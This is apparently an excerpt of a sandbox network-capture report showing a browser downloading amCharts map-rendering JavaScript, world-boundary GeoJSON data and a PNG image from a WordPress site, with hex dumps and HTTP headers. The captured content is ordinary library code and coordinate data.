                                                                                                                                          Data Ascii: ntMinor=function(n){return arguments.length?(e=+n[0][0],t=+n[1][0],o=+n[0][1],r=+n[1][1],e>t&&(n=e,e=t,t=n),o>r&&(n=o,o=r,r=n),m.precision(v)):[[e,o],[t,r]]},m.step=function(t){return arguments.length?m.stepMajor(t).stepMinor(t):m.stepMinor()},m.stepMajor
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 6e 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 74 72 65 61 6d 2e 70 6f 69 6e 74 28 69 5b 30 5d 2c 69 5b 31 5d 29 7d 7d 29 7d 28 6e 29 28 53 28 61 28 4d 28 6c 3d 74 29 29 29 29 29 7d 2c 77 2e 70 72 65 63 6c 69 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 53 3d 74 2c 50 3d 76 6f 69 64 20 30 2c 4f 28 29 29 3a 53 7d 2c 77 2e 70 6f 73 74 63 6c 69 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 4d 3d 74 2c 5f 3d 69 3d 72 3d 6f 3d 6e 75 6c 6c 2c 4f 28 29 29 3a 4d 7d 2c 77 2e 63 6c 69 70 41 6e 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 53 3d 2b
                                                                                                                                          Data Ascii: n);return this.stream.point(i[0],i[1])}})}(n)(S(a(M(l=t)))))},w.preclip=function(t){return arguments.length?(S=t,P=void 0,O()):S},w.postclip=function(t){return arguments.length?(M=t,_=i=r=o=null,O()):M},w.clipAngle=function(t){return arguments.length?(S=+
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 69 28 79 72 29 2e 73 63 61 6c 65 28 32 35 30 29 2e 63 6c 69 70 41 6e 67 6c 65 28 31 34 32 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 50 72 28 74 2c 65 29 7b 72 65 74 75 72 6e 5b 44 28 56 28 28 4d 2b 65 29 2f 32 29 29 2c 2d 74 5d 7d 50 72 2e 69 6e 76 65 72 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 5b 2d 65 2c 32 2a 45 28 47 28 74 29 29 2d 4d 5d 7d 3b 76 61 72 20 53 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 69 28 50 72 29 2c 65 3d 74 2e 63 65 6e 74 65 72 2c 6e 3d 74 2e 72 6f 74 61 74 65 3b 72 65 74 75 72 6e 20 74 2e 63 65 6e 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 65 28 5b 2d 74 5b
                                                                                                                                          Data Ascii: r=function(){return Di(yr).scale(250).clipAngle(142)};function Pr(t,e){return[D(V((M+e)/2)),-t]}Pr.invert=function(t,e){return[-e,2*E(G(t))-M]};var Sr=function(){var t=Ui(Pr),e=t.center,n=t.rotate;return t.center=function(t){return arguments.length?e([-t[
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 6f 70 65 72 74 79 56 61 6c 75 65 28 22 6c 61 74 69 74 75 64 65 22 2c 74 2c 21 31 2c 21 30 29 2c 74 68 69 73 2e 75 70 64 61 74 65 45 78 74 72 65 6d 65 73 28 29 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 6f 6e 67 69 74 75 64 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 6c 6f 6e 67 69 74 75 64 65 22 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 73 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 6c 6f 6e 67 69 74 75 64 65 22 2c 74 2c 21 31 2c 21 30 29 2c 74 68 69 73
                                                                                                                                          Data Ascii: opertyValue("latitude",t,!1,!0),this.updateExtremes()},enumerable:!0,configurable:!0}),Object.defineProperty(e.prototype,"longitude",{get:function(){return this.getPropertyValue("longitude")},set:function(t){this.setPropertyValue("longitude",t,!1,!0),this
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 69 64 3d 3d 75 7d 29 3b 63 3f 63 2e 6d 75 6c 74 69 50 6f 6c 79 67 6f 6e 7c 7c 28 63 2e 6d 75 6c 74 69 50 6f 6c 79 67 6f 6e 3d 73 29 3a 28 63 3d 7b 6d 75 6c 74 69 50 6f 6c 79 67 6f 6e 3a 73 2c 69 64 3a 75 2c 6d 61 64 65 46 72 6f 6d 47 65 6f 44 61 74 61 3a 21 30 7d 2c 72 2e 64 61 74 61 2e 70 75 73 68 28 63 29 29 2c 42 72 2e 73 6f 66 74 43 6f 70 79 50 72 6f 70 65 72 74 69 65 73 28 69 2e 70 72 6f 70 65 72 74 69 65 73 2c 63 29 7d 7d 7d 2c 72 3d 74 68 69 73 2c 6f 3d 30 2c 61 3d 6e 2e 6c 65 6e 67 74 68 3b 6f 3c 61 3b 6f 2b 2b 29 69 28 6f 29 7d 7d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 69 64 61 74 65 44 61 74 61 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 76
                                                                                                                                          Data Ascii: function(t,e){return t.id==u});c?c.multiPolygon||(c.multiPolygon=s):(c={multiPolygon:s,id:u,madeFromGeoData:!0},r.data.push(c)),Br.softCopyProperties(i.properties,c)}}},r=this,o=0,a=n.length;o<a;o++)i(o)}}t.prototype.validateData.call(this)},e.prototype.v
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 74 75 72 6e 20 74 3b 76 61 72 20 75 2c 73 2c 6c 2c 68 7d 66 75 6e 63 74 69 6f 6e 20 65 6f 28 74 29 7b 72 65 74 75 72 6e 28 74 25 3d 33 36 30 29 3e 31 38 30 26 26 28 74 2d 3d 33 36 30 29 2c 74 3c 2d 31 38 30 26 26 28 74 2b 3d 33 36 30 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 6f 28 74 29 7b 72 65 74 75 72 6e 7b 78 3a 74 2e 6c 6f 6e 67 69 74 75 64 65 2c 79 3a 74 2e 6c 61 74 69 74 75 64 65 7d 7d 76 61 72 20 69 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 65 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 72 65 74 75 72 6e 20 65 2e 61 64 6a 75 73 74 52 6f 74 61 74 69 6f 6e 3d 21 30 2c 65 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 4d 61 70 4c 69 6e 65 4f 62 6a 65 63 74 22 2c 65 2e 69 73 4d 65 61 73 75 72 65
                                                                                                                                          Data Ascii: turn t;var u,s,l,h}function eo(t){return(t%=360)>180&&(t-=360),t<-180&&(t+=360),t}function no(t){return{x:t.longitude,y:t.latitude}}var io=function(t){function e(){var e=t.call(this)||this;return e.adjustRotation=!0,e.className="MapLineObject",e.isMeasure
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 6f 6e 28 29 7b 7d 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 22 73 68 6f 72 74 65 73 74 44 69 73 74 61 6e 63 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 73 68 6f 72 74 65 73 74 44 69 73 74 61 6e 63 65 22 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 73 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 73 68 6f 72 74 65 73 74 44 69 73 74 61 6e 63 65 22 2c 74 2c 21 30 29 7d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                          Data Ascii: on(){},Object.defineProperty(e.prototype,"shortestDistance",{get:function(){return this.getPropertyValue("shortestDistance")},set:function(t){this.setPropertyValue("shortestDistance",t,!0)},enumerable:!0,configurable:!0}),Object.defineProperty(e.prototype


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          47192.168.2.4498055.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:56 UTC588OUTGET /wp-content/themes/tentamus/assets/scripts/amcharts4/worldLow.js HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:57 UTC317INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:56 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 245638
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:56 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:32:57 UTC7875INData Raw: 61 6d 34 69 6e 74 65 72 6e 61 6c 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 28 5b 22 66 63 61 61 22 5d 2c 7b 41 54 7a 55 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 77 69 6e 64 6f 77 2e 61 6d 34 67 65 6f 64 61 74 61 5f 77 6f 72 6c 64 4c 6f 77 3d 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 66 65 61 74 75 72 65 73 3a 5b 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 22 2c 67 65 6f 6d 65 74 72 79 3a 7b 74 79 70 65 3a 22 50 6f 6c 79 67 6f 6e 22 2c 63 6f 6f 72 64 69 6e 61 74 65 73 3a 5b 5b 5b 31 37 39 2e 32 32 32 33 2c 2d 38 2e 35 35 34 5d 2c 5b
                                                                                                                                          Data Ascii: am4internal_webpackJsonp(["fcaa"],{ATzU:function(e,t,o){"use strict";Object.defineProperty(t,"__esModule",{value:!0});window.am4geodata_worldLow={type:"FeatureCollection",features:[{type:"Feature",geometry:{type:"Polygon",coordinates:[[[179.2223,-8.554],[
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 2c 69 64 3a 22 57 53 22 7d 2c 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 22 2c 67 65 6f 6d 65 74 72 79 3a 7b 74 79 70 65 3a 22 50 6f 6c 79 67 6f 6e 22 2c 63 6f 6f 72 64 69 6e 61 74 65 73 3a 5b 5b 5b 2d 31 37 38 2e 30 34 36 37 2c 2d 31 34 2e 33 31 38 34 5d 2c 5b 2d 31 37 38 2e 31 35 38 35 2c 2d 31 34 2e 33 31 31 38 5d 2c 5b 2d 31 37 38 2e 31 34 32 33 2c 2d 31 34 2e 32 34 32 35 5d 2c 5b 2d 31 37 38 2e 30 34 36 37 2c 2d 31 34 2e 33 31 38 34 5d 5d 5d 7d 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 6e 61 6d 65 3a 22 57 61 6c 6c 69 73 20 61 6e 64 20 46 75 74 75 6e 61 22 2c 69 64 3a 22 57 46 22 7d 2c 69 64 3a 22 57 46 22 7d 2c 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 22 2c 67 65 6f 6d 65 74 72 79 3a 7b 74 79 70 65 3a 22 4d 75 6c 74 69 50 6f 6c 79 67 6f 6e 22 2c 63 6f
                                                                                                                                          Data Ascii: ,id:"WS"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[-178.0467,-14.3184],[-178.1585,-14.3118],[-178.1423,-14.2425],[-178.0467,-14.3184]]]},properties:{name:"Wallis and Futuna",id:"WF"},id:"WF"},{type:"Feature",geometry:{type:"MultiPolygon",co
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 39 36 32 33 2c 35 35 2e 37 39 34 38 5d 2c 5b 2d 31 36 31 2e 30 39 39 35 2c 35 35 2e 34 30 35 37 5d 2c 5b 2d 31 36 31 2e 37 34 31 36 2c 35 35 2e 33 39 31 31 5d 2c 5b 2d 31 36 32 2e 30 37 34 31 2c 35 35 2e 31 33 39 34 5d 2c 5b 2d 31 36 32 2e 38 36 35 31 2c 35 34 2e 39 35 34 35 5d 2c 5b 2d 31 36 32 2e 39 36 32 31 2c 35 35 2e 31 38 33 38 5d 2c 5b 2d 31 36 32 2e 31 35 37 31 2c 35 35 2e 37 31 39 35 5d 2c 5b 2d 31 36 31 2e 32 31 35 36 2c 35 36 2e 30 32 31 34 5d 2c 5b 2d 31 36 30 2e 38 35 31 34 2c 35 35 2e 37 37 31 39 5d 2c 5b 2d 31 36 30 2e 33 30 32 31 2c 35 36 2e 33 31 34 31 5d 2c 5b 2d 31 35 39 2e 32 38 33 31 2c 35 36 2e 36 38 38 36 5d 2c 5b 2d 31 35 38 2e 33 32 31 2c 35 37 2e 32 39 37 38 5d 2c 5b 2d 31 35 37 2e 36 30 37 37 2c 35 37 2e 36 30 31 34 5d 2c 5b 2d
                                                                                                                                          Data Ascii: 9623,55.7948],[-161.0995,55.4057],[-161.7416,55.3911],[-162.0741,55.1394],[-162.8651,54.9545],[-162.9621,55.1838],[-162.1571,55.7195],[-161.2156,56.0214],[-160.8514,55.7719],[-160.3021,56.3141],[-159.2831,56.6886],[-158.321,57.2978],[-157.6077,57.6014],[-
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 5d 2c 5b 32 33 2e 36 30 35 33 2c 35 31 2e 35 31 37 39 5d 2c 5b 32 34 2e 33 36 31 37 2c 35 31 2e 38 36 37 34 5d 2c 5b 32 35 2e 39 32 35 31 2c 35 31 2e 39 31 33 36 5d 2c 5b 32 37 2e 31 34 32 32 2c 35 31 2e 37 35 32 5d 2c 5b 32 37 2e 32 37 30 31 2c 35 31 2e 36 31 33 35 5d 2c 5b 32 38 2e 35 39 39 31 2c 35 31 2e 35 34 32 37 5d 2c 5b 32 39 2e 31 33 35 37 2c 35 31 2e 36 31 37 33 5d 2c 5b 32 39 2e 33 34 36 36 2c 35 31 2e 33 38 32 35 5d 2c 5b 33 30 2e 35 33 33 31 2c 35 31 2e 35 39 36 34 5d 2c 5b 33 30 2e 39 38 30 36 2c 35 32 2e 30 34 36 31 5d 2c 5b 33 31 2e 37 36 33 36 2c 35 32 2e 31 30 31 32 5d 2c 5b 33 32 2e 35 30 38 2c 35 32 2e 33 30 38 34 5d 2c 5b 33 33 2e 37 33 35 33 2c 35 32 2e 33 34 34 38 5d 2c 5b 33 34 2e 33 39 37 36 2c 35 31 2e 37 38 30 34 5d 2c 5b 33 34
                                                                                                                                          Data Ascii: ],[23.6053,51.5179],[24.3617,51.8674],[25.9251,51.9136],[27.1422,51.752],[27.2701,51.6135],[28.5991,51.5427],[29.1357,51.6173],[29.3466,51.3825],[30.5331,51.5964],[30.9806,52.0461],[31.7636,52.1012],[32.508,52.3084],[33.7353,52.3448],[34.3976,51.7804],[34
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 34 30 2e 36 35 37 32 5d 2c 5b 37 30 2e 34 34 31 37 2c 34 31 2e 30 32 33 34 5d 2c 5b 37 30 2e 37 35 31 31 2c 34 30 2e 37 33 39 37 5d 2c 5b 37 30 2e 33 38 32 36 2c 34 30 2e 34 35 33 34 5d 2c 5b 37 30 2e 39 35 37 39 2c 34 30 2e 32 33 39 5d 5d 5d 7d 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 6e 61 6d 65 3a 22 54 61 6a 69 6b 69 73 74 61 6e 22 2c 69 64 3a 22 54 4a 22 7d 2c 69 64 3a 22 54 4a 22 7d 2c 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 22 2c 67 65 6f 6d 65 74 72 79 3a 7b 74 79 70 65 3a 22 50 6f 6c 79 67 6f 6e 22 2c 63 6f 6f 72 64 69 6e 61 74 65 73 3a 5b 5b 5b 31 30 30 2e 31 32 32 35 2c 32 30 2e 33 31 36 37 5d 2c 5b 31 30 30 2e 35 34 32 39 2c 32 30 2e 30 38 38 35 5d 2c 5b 31 30 30 2e 33 39 37 37 2c 31 39 2e 37 35 36 31 5d 2c 5b 31 30 30 2e 36 32 35 34 2c 31 39
                                                                                                                                          Data Ascii: 40.6572],[70.4417,41.0234],[70.7511,40.7397],[70.3826,40.4534],[70.9579,40.239]]]},properties:{name:"Tajikistan",id:"TJ"},id:"TJ"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[100.1225,20.3167],[100.5429,20.0885],[100.3977,19.7561],[100.6254,19
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 32 31 2e 33 39 30 37 2c 34 32 2e 37 35 31 35 5d 2c 5b 32 31 2e 30 35 36 39 2c 34 33 2e 30 39 31 35 5d 2c 5b 32 30 2e 33 34 34 35 2c 34 32 2e 38 32 37 38 5d 2c 5b 31 39 2e 35 35 31 37 2c 34 33 2e 32 31 32 32 5d 2c 5b 31 39 2e 31 39 34 33 2c 34 33 2e 35 33 33 31 5d 2c 5b 31 39 2e 34 38 38 32 2c 34 33 2e 37 30 33 36 5d 2c 5b 31 39 2e 31 35 31 37 2c 34 34 2e 33 30 32 34 5d 2c 5b 31 39 2e 33 35 36 38 2c 34 34 2e 38 35 38 36 5d 2c 5b 31 39 2e 30 30 37 2c 34 34 2e 38 36 39 33 5d 2c 5b 31 39 2e 30 35 34 39 2c 34 35 2e 35 32 37 31 5d 2c 5b 31 38 2e 39 30 35 34 2c 34 35 2e 39 33 31 35 5d 2c 5b 31 39 2e 35 33 30 38 2c 34 36 2e 31 35 35 32 5d 2c 5b 32 30 2e 32 34 31 39 2c 34 36 2e 31 30 38 36 5d 5d 5d 7d 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 6e 61 6d 65 3a 22 53 65
                                                                                                                                          Data Ascii: 21.3907,42.7515],[21.0569,43.0915],[20.3445,42.8278],[19.5517,43.2122],[19.1943,43.5331],[19.4882,43.7036],[19.1517,44.3024],[19.3568,44.8586],[19.007,44.8693],[19.0549,45.5271],[18.9054,45.9315],[19.5308,46.1552],[20.2419,46.1086]]]},properties:{name:"Se
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 2c 32 36 2e 35 39 34 37 5d 2c 5b 33 35 2e 35 38 31 35 2c 32 37 2e 34 33 32 33 5d 2c 5b 33 35 2e 31 38 30 37 2c 32 38 2e 30 33 34 37 5d 2c 5b 33 34 2e 36 31 36 2c 32 38 2e 31 34 38 33 5d 2c 5b 33 34 2e 37 37 39 38 2c 32 38 2e 35 30 37 34 5d 2c 5b 33 34 2e 39 35 30 37 2c 32 39 2e 33 35 33 35 5d 2c 5b 33 36 2e 30 31 35 36 2c 32 39 2e 31 39 30 36 5d 2c 5b 33 36 2e 34 37 35 39 2c 32 39 2e 34 39 35 31 5d 2c 5b 33 36 2e 37 35 35 31 2c 32 39 2e 38 36 36 32 5d 2c 5b 33 37 2e 34 36 39 34 2c 32 39 2e 39 39 34 39 5d 2c 5b 33 37 2e 36 33 33 36 2c 33 30 2e 33 31 33 32 5d 2c 5b 33 37 2e 39 38 30 33 2c 33 30 2e 35 5d 2c 5b 33 36 2e 39 35 38 34 2c 33 31 2e 34 39 31 37 5d 2c 5b 33 38 2e 39 36 32 32 2c 33 31 2e 39 39 35 31 5d 2c 5b 33 39 2e 31 34 35 35 2c 33 32 2e 31 32 34
                                                                                                                                          Data Ascii: ,26.5947],[35.5815,27.4323],[35.1807,28.0347],[34.616,28.1483],[34.7798,28.5074],[34.9507,29.3535],[36.0156,29.1906],[36.4759,29.4951],[36.7551,29.8662],[37.4694,29.9949],[37.6336,30.3132],[37.9803,30.5],[36.9584,31.4917],[38.9622,31.9951],[39.1455,32.124
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 5b 33 35 2e 34 31 31 35 2c 35 30 2e 35 33 39 38 5d 2c 5b 33 35 2e 33 31 32 31 2c 35 31 2e 30 34 33 38 5d 2c 5b 33 34 2e 32 38 30 39 2c 35 31 2e 33 31 31 37 5d 2c 5b 33 34 2e 33 39 37 36 2c 35 31 2e 37 38 30 34 5d 2c 5b 33 33 2e 37 33 35 33 2c 35 32 2e 33 34 34 38 5d 2c 5b 33 32 2e 35 30 38 2c 35 32 2e 33 30 38 34 5d 2c 5b 33 31 2e 37 36 33 36 2c 35 32 2e 31 30 31 32 5d 2c 5b 33 31 2e 35 37 37 31 2c 35 32 2e 33 31 32 32 5d 2c 5b 33 31 2e 34 31 37 38 2c 35 33 2e 31 39 36 5d 2c 5b 33 32 2e 31 34 32 32 2c 35 33 2e 30 39 31 33 5d 2c 5b 33 32 2e 37 30 34 32 2c 35 33 2e 33 33 36 33 5d 2c 5b 33 31 2e 37 39 32 2c 35 34 2e 30 35 35 38 5d 2c 5b 33 31 2e 34 30 33 36 2c 35 34 2e 31 39 35 39 5d 2c 5b 33 31 2e 31 32 31 33 2c 35 34 2e 36 34 38 34 5d 2c 5b 33 30 2e 39 30
                                                                                                                                          Data Ascii: [35.4115,50.5398],[35.3121,51.0438],[34.2809,51.3117],[34.3976,51.7804],[33.7353,52.3448],[32.508,52.3084],[31.7636,52.1012],[31.5771,52.3122],[31.4178,53.196],[32.1422,53.0913],[32.7042,53.3363],[31.792,54.0558],[31.4036,54.1959],[31.1213,54.6484],[30.90
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 31 5d 2c 5b 35 35 2e 33 35 36 2c 37 32 2e 34 36 35 31 5d 2c 5b 35 35 2e 32 39 37 38 2c 37 31 2e 39 33 35 34 5d 2c 5b 35 37 2e 31 34 35 38 2c 37 30 2e 35 38 39 5d 2c 5b 35 34 2e 36 30 30 39 2c 37 30 2e 36 38 5d 2c 5b 35 33 2e 37 32 32 35 2c 37 30 2e 38 31 34 35 5d 2c 5b 35 33 2e 33 36 33 38 2c 37 31 2e 35 34 31 36 5d 2c 5b 35 31 2e 38 31 32 34 2c 37 31 2e 34 39 31 32 5d 2c 5b 35 31 2e 35 38 32 35 2c 37 32 2e 30 37 31 32 5d 2c 5b 35 32 2e 36 32 32 31 2c 37 32 2e 33 30 30 39 5d 2c 5b 35 33 2e 37 35 33 31 2c 37 33 2e 32 39 33 32 5d 2c 5b 35 35 2e 33 32 2c 37 33 2e 33 30 38 33 5d 5d 5d 5d 7d 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 6e 61 6d 65 3a 22 52 75 73 73 69 61 22 2c 69 64 3a 22 52 55 22 7d 2c 69 64 3a 22 52 55 22 7d 2c 7b 74 79 70 65 3a 22 46 65 61 74 75
                                                                                                                                          Data Ascii: 1],[55.356,72.4651],[55.2978,71.9354],[57.1458,70.589],[54.6009,70.68],[53.7225,70.8145],[53.3638,71.5416],[51.8124,71.4912],[51.5825,72.0712],[52.6221,72.3009],[53.7531,73.2932],[55.32,73.3083]]]]},properties:{name:"Russia",id:"RU"},id:"RU"},{type:"Featu
                                                                                                                                          2024-11-28 10:32:57 UTC8000INData Raw: 39 31 36 33 5d 2c 5b 31 31 38 2e 34 33 34 38 2c 39 2e 32 35 36 32 5d 2c 5b 31 31 37 2e 39 38 39 36 2c 38 2e 38 37 37 32 5d 2c 5b 31 31 37 2e 33 31 30 39 2c 38 2e 34 33 39 35 5d 5d 5d 2c 5b 5b 5b 31 32 34 2e 35 37 34 37 2c 31 31 2e 33 34 33 5d 2c 5b 31 32 34 2e 39 32 39 39 2c 31 31 2e 33 37 32 37 5d 2c 5b 31 32 35 2e 30 31 33 33 2c 31 30 2e 37 38 35 34 5d 2c 5b 31 32 35 2e 32 35 33 35 2c 31 30 2e 32 36 33 39 5d 2c 5b 31 32 35 2e 30 32 36 36 2c 31 30 2e 30 33 33 31 5d 2c 5b 31 32 34 2e 37 38 30 37 2c 31 30 2e 31 36 38 5d 2c 5b 31 32 34 2e 37 38 36 39 2c 31 30 2e 37 38 31 35 5d 2c 5b 31 32 34 2e 34 34 35 36 2c 31 30 2e 39 32 33 35 5d 2c 5b 31 32 34 2e 35 37 34 37 2c 31 31 2e 33 34 33 5d 5d 5d 2c 5b 5b 5b 31 32 32 2e 34 39 36 34 2c 31 31 2e 36 31 35 31 5d 2c
                                                                                                                                          Data Ascii: 9163],[118.4348,9.2562],[117.9896,8.8772],[117.3109,8.4395]]],[[[124.5747,11.343],[124.9299,11.3727],[125.0133,10.7854],[125.2535,10.2639],[125.0266,10.0331],[124.7807,10.168],[124.7869,10.7815],[124.4456,10.9235],[124.5747,11.343]]],[[[122.4964,11.6151],


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          48192.168.2.4498065.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:56 UTC397OUTGET /wp-content/themes/tentamus-labor/images/MemberTag.png HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:57 UTC280INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:56 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 13065
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:56 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/png
